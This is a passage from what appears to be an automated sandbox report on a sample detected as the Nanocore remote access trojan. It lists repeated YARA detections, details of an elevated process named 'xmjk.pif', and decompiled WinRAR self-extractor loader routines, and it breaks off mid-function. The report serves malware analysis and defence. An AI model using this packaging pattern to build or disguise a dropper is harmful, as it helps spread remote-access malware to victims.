              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000019.00000002.415517736.0000000000BC2000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000019.00000002.415517736.0000000000BC2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

              General

              Start time:12:34:52
              Start date:12/10/2021
              Path:C:\Users\user\31956653\xmjk.pif
              Wow64 process (32bit):true
              Commandline:'C:\Users\user\31956653\xmjk.pif' C:\Users\user\31956653\thjfdg.xcp
              Imagebase:0x3f0000
              File size:776432 bytes
              MD5 hash:279DAE7236F5F2488A4BACDE6027F730
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001B.00000003.411798480.0000000003E28000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001B.00000003.411798480.0000000003E28000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001B.00000003.411798480.0000000003E28000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001B.00000003.412888978.0000000003E28000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001B.00000003.412888978.0000000003E28000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001B.00000003.412888978.0000000003E28000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001B.00000003.411513032.0000000003D56000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001B.00000003.411513032.0000000003D56000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001B.00000003.411513032.0000000003D56000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001B.00000003.411892507.0000000003E5C000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001B.00000003.411892507.0000000003E5C000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001B.00000003.411892507.0000000003E5C000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001B.00000003.414829262.0000000003D56000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001B.00000003.414829262.0000000003D56000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001B.00000003.414829262.0000000003D56000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001B.00000003.411602320.0000000003DBF000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001B.00000003.411602320.0000000003DBF000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001B.00000003.411602320.0000000003DBF000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001B.00000003.412949182.00000000005A6000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001B.00000003.412949182.00000000005A6000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001B.00000003.412949182.00000000005A6000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001B.00000003.414560875.0000000003DF3000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001B.00000003.414560875.0000000003DF3000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001B.00000003.414560875.0000000003DF3000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001B.00000003.411727538.0000000003DF4000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001B.00000003.411727538.0000000003DF4000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001B.00000003.411727538.0000000003DF4000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001B.00000003.414304073.0000000003D8A000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001B.00000003.414304073.0000000003D8A000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001B.00000003.414304073.0000000003D8A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001B.00000003.413709722.0000000003DBF000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001B.00000003.413709722.0000000003DBF000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001B.00000003.413709722.0000000003DBF000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001B.00000003.411158873.0000000003D56000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001B.00000003.411158873.0000000003D56000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001B.00000003.411158873.0000000003D56000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001B.00000003.411291828.0000000003DBF000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001B.00000003.411291828.0000000003DBF000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001B.00000003.411291828.0000000003DBF000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001B.00000003.411683482.0000000003DF4000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001B.00000003.411683482.0000000003DF4000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001B.00000003.411683482.0000000003DF4000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001B.00000003.411424843.0000000003D8A000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001B.00000003.411424843.0000000003D8A000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001B.00000003.411424843.0000000003D8A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001B.00000003.415163976.0000000003D21000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001B.00000003.415163976.0000000003D21000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001B.00000003.415163976.0000000003D21000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001B.00000003.411346377.0000000003D21000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001B.00000003.411346377.0000000003D21000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001B.00000003.411346377.0000000003D21000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

              Disassembly

              Code Analysis

                Executed Functions

                C-Code - Quality: 17%
                			E00CBCBB8(void* __edx, void* __ebp, void* __eflags, void* __fp0, void* _a92, void* _a94, void* _a98, void* _a100, void* _a102, void* _a104, void* _a106, void* _a108, void* _a112, void* _a152, void* _a156, void* _a204) {
                				char _v208;
                				void* __ebx;
                				void* __edi;
                				void* _t41;
                				long _t51;
                				void* _t54;
                				intOrPtr _t58;
                				struct HWND__* _t74;
                				void* _t75;
                				WCHAR* _t95;
                				struct HINSTANCE__* _t97;
                				intOrPtr _t99;
                				void* _t103;
                				void* _t105;
                				void* _t106;
                				void* _t107;
                				void* _t125;
                
                				_t125 = __fp0;
                				_t89 = __edx;
                				E00CAFD49(__edx, 1);
                				E00CB95F8("C:\Users\hardz\Desktop", 0x800);
                				E00CB9AA0( &_v208); // executed
                				E00CB1017(0xce7370);
                				_t74 = 0;
                				E00CBE920(0x7104, 0xcf5d08, 0, 0x7104);
                				_t106 = _t105 + 0xc;
                				_t95 = GetCommandLineW();
                				_t110 = _t95;
                				if(_t95 != 0) {
                					_push(_t95);
                					E00CBB356(0, _t110);
                					if( *0xce9601 == 0) {
                						E00CBC891(__eflags, _t95); // executed
                					} else {
                						_t103 = OpenFileMappingW(0xf001f, 0, L"winrarsfxmappingfile.tmp");
                						if(_t103 != 0) {
                							UnmapViewOfFile(_t75);
                							_t74 = 0;
                						}
                						CloseHandle(_t103);
                					}
                				}
                				GetModuleFileNameW(_t74, 0xcfce18, 0x800);
                				SetEnvironmentVariableW(L"sfxname", 0xcfce18);
                				GetLocalTime(_t106 + 0xc);
                				_push( *(_t106 + 0x1a) & 0x0000ffff);
                				_push( *(_t106 + 0x1c) & 0x0000ffff);
                				_push( *(_t106 + 0x1e) & 0x0000ffff);
                				_push( *(_t106 + 0x20) & 0x0000ffff);
                				_push( *(_t106 + 0x22) & 0x0000ffff);
                				_push( *(_t106 + 0x22) & 0x0000ffff);
                				E00CA3E41(_t106 + 0x9c, 0x32, L"%4d-%02d-%02d-%02d-%02d-%02d-%03d",  *(_t106 + 0x24) & 0x0000ffff);
                				_t107 = _t106 + 0x28;
                				SetEnvironmentVariableW(L"sfxstime", _t107 + 0x7c);
                				_t97 = GetModuleHandleW(_t74);
                				 *0xce0064 = _t97;
                				 *0xce0060 = _t97; // executed
                				_t41 = LoadIconW(_t97, 0x64); // executed
                				 *0xceb704 = _t41;
                				 *0xcf5d04 = E00CBA4F8(_t89, _t125);
                				E00CACFAB(0xce0078, _t89, 0xcfce18);
                				E00CB83FC(0);
                				E00CB83FC(0);
                				 *0xce75e8 = _t107 + 0x5c;
                				 *0xce75ec = _t107 + 0x30; // executed
                				DialogBoxParamW(_t97, L"STARTDLG", _t74, E00CBA5D1, _t74); // executed
                				 *0xce75ec = _t74;
                				 *0xce75e8 = _t74;
                				E00CB84AE(_t107 + 0x24);
                				E00CB84AE(_t107 + 0x50);
                				_t51 =  *0xcfde28;
                				if(_t51 != 0) {
                					Sleep(_t51);
                				}
                				if( *0xce85f8 != 0) {
                					E00CB9CA1(0xcfce18);
                				}
                				E00CAE797(0xcf5c00);
                				if( *0xce75e4 > 0) {
                					L00CC2B4E( *0xce75e0);
                				}
                				DeleteObject( *0xceb704);
                				_t54 =  *0xcf5d04;
                				if(_t54 != 0) {
                					DeleteObject(_t54);
                				}
                				if( *0xce00e0 == 0 &&  *0xce75d7 != 0) {
                					E00CA6E03(0xce00e0, 0xff);
                				}
                				_t55 =  *0xcfde2c;
                				 *0xce75d7 = 1;
                				if( *0xcfde2c != 0) {
                					E00CBC8F0(_t55);
                					CloseHandle( *0xcfde2c);
                				}
                				_t99 =  *0xce00e0; // 0x0
                				if( *0xcfde21 != 0) {
                					_t58 =  *0xcdd5fc; // 0x3e8
                					if( *0xcfde22 == 0) {
                						__eflags = _t58;
                						if(_t58 < 0) {
                							_t99 = _t99 - _t58;
                							__eflags = _t99;
                						}
                					} else {
                						_t99 =  *0xcfde24;
                						if(_t58 > 0) {
                							_t99 = _t99 + _t58;
                						}
                					}
                				}
                				E00CB9B08(_t107 + 0x1c); // executed
                				return _t99;
                			}

                APIs
                  • Part of subcall function 00CAFD49: GetModuleHandleW.KERNEL32 ref: 00CAFD61
                  • Part of subcall function 00CAFD49: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00CAFD79
                  • Part of subcall function 00CAFD49: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CAFD9C
                  • Part of subcall function 00CB95F8: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00CB9600
                  • Part of subcall function 00CB9AA0: OleInitialize.OLE32(00000000), ref: 00CB9AB9
                  • Part of subcall function 00CB9AA0: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00CB9AF0
                  • Part of subcall function 00CB9AA0: SHGetMalloc.SHELL32(00CE75C0), ref: 00CB9AFA
                  • Part of subcall function 00CB1017: GetCPInfo.KERNEL32(00000000,?), ref: 00CB1028
                  • Part of subcall function 00CB1017: IsDBCSLeadByte.KERNEL32(00000000), ref: 00CB103C
                • GetCommandLineW.KERNEL32 ref: 00CBCC00
                • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00CBCC27
                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00CBCC38
                • UnmapViewOfFile.KERNEL32(00000000), ref: 00CBCC72
                  • Part of subcall function 00CBC891: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00CBC8A7
                  • Part of subcall function 00CBC891: SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00CBC8E3
                • CloseHandle.KERNEL32(00000000), ref: 00CBCC7B
                • GetModuleFileNameW.KERNEL32(00000000,00CFCE18,00000800), ref: 00CBCC96
                • SetEnvironmentVariableW.KERNEL32(sfxname,00CFCE18), ref: 00CBCCA8
                • GetLocalTime.KERNEL32(?), ref: 00CBCCAF
                • _swprintf.LIBCMT ref: 00CBCCEE
                • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00CBCD00
                • GetModuleHandleW.KERNEL32(00000000), ref: 00CBCD03
                • LoadIconW.USER32(00000000,00000064), ref: 00CBCD1A
                • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001A5D1,00000000), ref: 00CBCD6B
                • Sleep.KERNEL32(?), ref: 00CBCD99
                • DeleteObject.GDI32 ref: 00CBCDD8
                • DeleteObject.GDI32(?), ref: 00CBCDE4
                • CloseHandle.KERNEL32 ref: 00CBCE23
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                • API String ID: 788466649-586660713
                • Opcode ID: 55cf8d644b5c9bde859b691c9c0d032863525dce9d5696a107db647260a74169
                • Instruction ID: a32f0b66bd82add5f187da57cafd42cc2407f713d08a922b69c6060e1975a288
                • Opcode Fuzzy Hash: 55cf8d644b5c9bde859b691c9c0d032863525dce9d5696a107db647260a74169
                • Instruction Fuzzy Hash: 94610971905384ABD710AB71ECC9FBF3BECEB58700F04042AF646961A1DBB49D44DBA2
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 67%
                			E00CB963A(WCHAR* _a4) {
                				WCHAR* _v4;
                				intOrPtr _v8;
                				intOrPtr* _v16;
                				char _v20;
                				void* __ecx;
                				struct HRSRC__* _t14;
                				WCHAR* _t16;
                				void* _t17;
                				void* _t18;
                				void* _t19;
                				intOrPtr* _t26;
                				char* _t30;
                				long _t32;
                				void* _t34;
                				intOrPtr* _t35;
                				void* _t40;
                				struct HRSRC__* _t42;
                				intOrPtr* _t44;
                
                				_t14 = FindResourceW( *0xce0060, _a4, "PNG");
                				_t42 = _t14;
                				if(_t42 == 0) {
                					return _t14;
                				}
                				_t32 = SizeofResource( *0xce0060, _t42);
                				if(_t32 == 0) {
                					L4:
                					_t16 = 0;
                					L16:
                					return _t16;
                				}
                				_t17 = LoadResource( *0xce0060, _t42);
                				if(_t17 == 0) {
                					goto L4;
                				}
                				_t18 = LockResource(_t17);
                				_t43 = _t18;
                				if(_t18 != 0) {
                					_v4 = 0;
                					_t19 = GlobalAlloc(2, _t32); // executed
                					_t40 = _t19;
                					if(_t40 == 0) {
                						L15:
                						_t16 = _v4;
                						goto L16;
                					}
                					if(GlobalLock(_t40) == 0) {
                						L14:
                						GlobalFree(_t40);
                						goto L15;
                					}
                					E00CBEA80(_t20, _t43, _t32);
                					_a4 = 0;
                					_push( &_a4);
                					_push(0);
                					_push(_t40);
                					if( *0xcddff8() == 0) {
                						_t26 = E00CB95CF(_t24, _t34, _v8, 0); // executed
                						_t35 = _v16;
                						_t44 = _t26;
                						 *((intOrPtr*)( *_t35 + 8))(_t35);
                						if(_t44 != 0) {
                							 *((intOrPtr*)(_t44 + 8)) = 0;
                							if( *((intOrPtr*)(_t44 + 8)) == 0) {
                								_push(0xffffff);
                								_t30 =  &_v20;
                								_push(_t30);
                								_push( *((intOrPtr*)(_t44 + 4)));
                								L00CBD81A(); // executed
                								if(_t30 != 0) {
                									 *((intOrPtr*)(_t44 + 8)) = _t30;
                								}
                							}
                							 *((intOrPtr*)( *_t44))(1);
                						}
                					}
                					GlobalUnlock(_t40);
                					goto L14;
                				}
                				goto L4;
                			}






















                APIs
                • FindResourceW.KERNEL32(00000066,PNG,?,?,00CBA54A,00000066), ref: 00CB964B
                • SizeofResource.KERNEL32(00000000,76B95B70,?,?,00CBA54A,00000066), ref: 00CB9663
                • LoadResource.KERNEL32(00000000,?,?,00CBA54A,00000066), ref: 00CB9676
                • LockResource.KERNEL32(00000000,?,?,00CBA54A,00000066), ref: 00CB9681
                • GlobalAlloc.KERNELBASE(00000002,00000000,00000000,?,?,?,00CBA54A,00000066), ref: 00CB969F
                • GlobalLock.KERNEL32 ref: 00CB96AC
                • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00CB9707
                • GlobalUnlock.KERNEL32(00000000), ref: 00CB971C
                • GlobalFree.KERNEL32 ref: 00CB9723
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
                • String ID: PNG
                • API String ID: 4097654274-364855578
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 80%
                			E00CAA2DF(void* __edx, intOrPtr _a4, intOrPtr _a8, char _a32, short _a592, void* _a4692, WCHAR* _a4696, intOrPtr _a4700) {
                				struct _WIN32_FIND_DATAW _v0;
                				char _v4;
                				intOrPtr _v8;
                				intOrPtr _v12;
                				intOrPtr _v16;
                				char _v20;
                				char _v24;
                				signed int _t43;
                				signed int _t49;
                				signed int _t63;
                				void* _t65;
                				long _t68;
                				char _t69;
                				void* _t73;
                				void* _t82;
                				intOrPtr _t84;
                				void* _t87;
                				signed int _t89;
                				void* _t90;
                
                				_t82 = __edx;
                				E00CBD940();
                				_push(_t89);
                				_t87 = _a4692;
                				_t84 = _a4700;
                				_t90 = _t89 | 0xffffffff;
                				_push( &_v0);
                				if(_t87 != _t90) {
                					_t43 = FindNextFileW(_t87, ??);
                					__eflags = _t43;
                					if(_t43 == 0) {
                						_t87 = _t90;
                						_t63 = GetLastError();
                						__eflags = _t63 - 0x12;
                						_t11 = _t63 != 0x12;
                						__eflags = _t11;
                						 *((char*)(_t84 + 0x1044)) = _t63 & 0xffffff00 | _t11;
                					}
                					__eflags = _t87 - _t90;
                					if(_t87 != _t90) {
                						goto L13;
                					}
                				} else {
                					_t65 = FindFirstFileW(_a4696, ??); // executed
                					_t87 = _t65;
                					if(_t87 != _t90) {
                						L13:
                						E00CAFAB1(_t84, _a4696, 0x800);
                						_push(0x800);
                						E00CAB9B9(__eflags, _t84,  &_a32);
                						_t49 = 0 + _a8;
                						__eflags = _t49;
                						 *(_t84 + 0x1000) = _t49;
                						asm("adc ecx, 0x0");
                						 *((intOrPtr*)(_t84 + 0x1008)) = _v24;
                						 *((intOrPtr*)(_t84 + 0x1028)) = _v20;
                						 *((intOrPtr*)(_t84 + 0x102c)) = _v16;
                						 *((intOrPtr*)(_t84 + 0x1030)) = _v12;
                						 *((intOrPtr*)(_t84 + 0x1034)) = _v8;
                						 *((intOrPtr*)(_t84 + 0x1038)) = _v4;
                						 *(_t84 + 0x103c) = _v0.dwFileAttributes;
                						 *((intOrPtr*)(_t84 + 0x1004)) = _a4;
                						E00CB0A81(_t84 + 0x1010, _t82,  &_v4);
                						E00CB0A81(_t84 + 0x1018, _t82,  &_v24);
                						E00CB0A81(_t84 + 0x1020, _t82,  &_v20);
                					} else {
                						if(E00CAB32C(_a4696,  &_a592, 0x800) == 0) {
                							L4:
                							_t68 = GetLastError();
                							if(_t68 == 2 || _t68 == 3 || _t68 == 0x12) {
                								_t69 = 0;
                								__eflags = 0;
                							} else {
                								_t69 = 1;
                							}
                							 *((char*)(_t84 + 0x1044)) = _t69;
                						} else {
                							_t73 = FindFirstFileW( &_a592,  &_v0); // executed
                							_t87 = _t73;
                							if(_t87 != _t90) {
                								goto L13;
                							} else {
                								goto L4;
                							}
                						}
                					}
                				}
                				 *(_t84 + 0x1040) =  *(_t84 + 0x1040) & 0x00000000;
                				return _t87;
                			}























                APIs
                • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00CAA1DA,000000FF,?,?), ref: 00CAA314
                • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00CAA1DA,000000FF,?,?), ref: 00CAA34A
                • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00CAA1DA,000000FF,?,?), ref: 00CAA352
                • FindNextFileW.KERNEL32(?,?,?,?,?,?,00CAA1DA,000000FF,?,?), ref: 00CAA37A
                • GetLastError.KERNEL32(?,?,?,?,00CAA1DA,000000FF,?,?), ref: 00CAA386
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: FileFind$ErrorFirstLast$Next
                • String ID:
                • API String ID: 869497890-0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00CC6AF3(int _a4) {
                				void* _t14;
                				void* _t16;
                
                				if(E00CC9D6E(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
                					TerminateProcess(GetCurrentProcess(), _a4);
                				}
                				E00CC6B78(_t14, _t16, _a4);
                				ExitProcess(_a4);
                			}






                APIs
                • GetCurrentProcess.KERNEL32(?,?,00CC6AC9,?,00CDA800,0000000C,00CC6C20,?,00000002,00000000), ref: 00CC6B14
                • TerminateProcess.KERNEL32(00000000,?,00CC6AC9,?,00CDA800,0000000C,00CC6C20,?,00000002,00000000), ref: 00CC6B1B
                • ExitProcess.KERNEL32 ref: 00CC6B2D
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: Process$CurrentExitTerminate
                • String ID:
                • API String ID: 1703294689-0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			E00CA83C0(intOrPtr __ecx) {
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				signed int _t370;
                				signed int _t374;
                				signed int _t375;
                				signed int _t380;
                				signed int _t385;
                				void* _t387;
                				signed int _t388;
                				signed int _t392;
                				signed int _t393;
                				signed int _t398;
                				signed int _t403;
                				signed int _t404;
                				signed int _t408;
                				signed int _t418;
                				signed int _t419;
                				signed int _t422;
                				signed int _t423;
                				signed int _t432;
                				char _t434;
                				char _t436;
                				signed int _t437;
                				signed int _t438;
                				signed int _t460;
                				signed int _t469;
                				intOrPtr _t472;
                				char _t479;
                				signed int _t480;
                				void* _t491;
                				void* _t499;
                				void* _t501;
                				signed int _t511;
                				signed int _t515;
                				signed int _t516;
                				signed int _t517;
                				signed int _t520;
                				signed int _t523;
                				signed int _t531;
                				signed int _t541;
                				signed int _t543;
                				signed int _t545;
                				signed int _t547;
                				signed char _t548;
                				signed int _t551;
                				void* _t556;
                				signed int _t564;
                				intOrPtr* _t574;
                				intOrPtr _t576;
                				signed int _t577;
                				signed int _t586;
                				intOrPtr _t589;
                				signed int _t592;
                				signed int _t601;
                				signed int _t608;
                				signed int _t610;
                				signed int _t611;
                				signed int _t613;
                				signed int _t631;
                				signed int _t632;
                				void* _t639;
                				void* _t640;
                				signed int _t656;
                				signed int _t667;
                				intOrPtr _t668;
                				void* _t670;
                				signed int _t671;
                				signed int _t672;
                				signed int _t673;
                				signed int _t674;
                				signed int _t675;
                				signed int _t681;
                				intOrPtr _t683;
                				signed int _t688;
                				intOrPtr _t690;
                				signed int _t692;
                				signed int _t696;
                				void* _t698;
                				signed int _t699;
                				signed int _t702;
                				signed int _t703;
                				void* _t706;
                				void* _t708;
                				void* _t710;
                
                				_t576 = __ecx;
                				E00CBD870(E00CD12F2, _t706);
                				E00CBD940();
                				_t574 =  *((intOrPtr*)(_t706 + 8));
                				_t665 = 0;
                				_t683 = _t576;
                				 *((intOrPtr*)(_t706 - 0x20)) = _t683;
                				_t370 =  *( *(_t683 + 8) + 0x82f2) & 0x0000ffff;
                				 *(_t706 - 0x18) = _t370;
                				if( *(_t706 + 0xc) != 0) {
                					L6:
                					_t690 =  *((intOrPtr*)(_t574 + 0x21dc));
                					__eflags = _t690 - 2;
                					if(_t690 == 2) {
                						 *(_t683 + 0x10f5) = _t665;
                						__eflags =  *(_t574 + 0x32dc) - _t665;
                						if(__eflags > 0) {
                							L22:
                							__eflags =  *(_t574 + 0x32e4) - _t665;
                							if(__eflags > 0) {
                								L26:
                								_t577 =  *(_t683 + 8);
                								__eflags =  *((intOrPtr*)(_t577 + 0x615c)) - _t665;
                								if( *((intOrPtr*)(_t577 + 0x615c)) != _t665) {
                									L29:
                									 *(_t706 - 0x11) = _t665;
